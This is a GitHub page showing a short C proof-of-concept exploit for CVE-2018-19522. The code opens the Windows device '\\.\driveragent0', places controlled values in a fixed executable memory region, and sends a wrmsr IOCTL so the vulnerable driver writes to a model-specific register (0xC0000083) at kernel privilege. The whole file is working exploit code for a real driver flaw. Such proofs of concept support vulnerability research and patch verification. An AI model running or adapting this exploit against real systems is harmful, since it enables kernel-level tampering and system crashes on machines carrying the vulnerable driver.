-
Notifications
You must be signed in to change notification settings - Fork 20
/
CVE-2018-19522.c
32 lines (31 loc) · 1.28 KB
/
CVE-2018-19522.c
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
#include <windows.h>
#include <stdio.h>
typedef unsigned long long QWORD; // DWORD64
int main(int argc, char* argv[]) {
HANDLE hDriver = CreateFileW(L"\\\\.\\driveragent0", GENERIC_READ | GENERIC_WRITE, 0,
NULL, OPEN_EXISTING, 0, NULL); // Get a handle to the driver
if (hDriver != INVALID_HANDLE_VALUE) {
printf("[i] Found driver\n");
LPVOID lpInMemoryArea = VirtualAlloc((LPVOID)0x41000000, 0x100, MEM_RESERVE | MEM_COMMIT, PAGE_EXECUTE_READWRITE);
if (lpInMemoryArea == NULL) {
printf("[!!!] Unable to allocate memory\n");
ExitProcess(-1);
}
printf("[i] Allocated memory\n");
memset(lpInMemoryArea, 0x00, 0x100); // Clear memory area
// Sadly we can only control half of what we write to an MSR
DWORD dwFirst = 0xFFFFFFFF; // EDX (LOW)
DWORD dwSecond = 0xC0000083; // ECX and RAX HIGH
memmove((BYTE*)lpInMemoryArea + 4, &dwFirst, 4);
memmove((BYTE*)lpInMemoryArea + 8, &dwSecond, 4);
DWORD dwIoctl = 0x800020F4; // wrmsr IOCTL
printf("[i] Sending IOCTL 0x%X\n", dwIoctl);
DWORD dwBytesOut = 0;
NTSTATUS dwLastError = DeviceIoControl(hDriver, dwIoctl, lpInMemoryArea, 0x20, NULL, 0, &dwBytesOut, NULL);
}
else {
printf("[!!!] Unable to find driver\n");
ExitProcess(-1);
}
ExitProcess(0);
}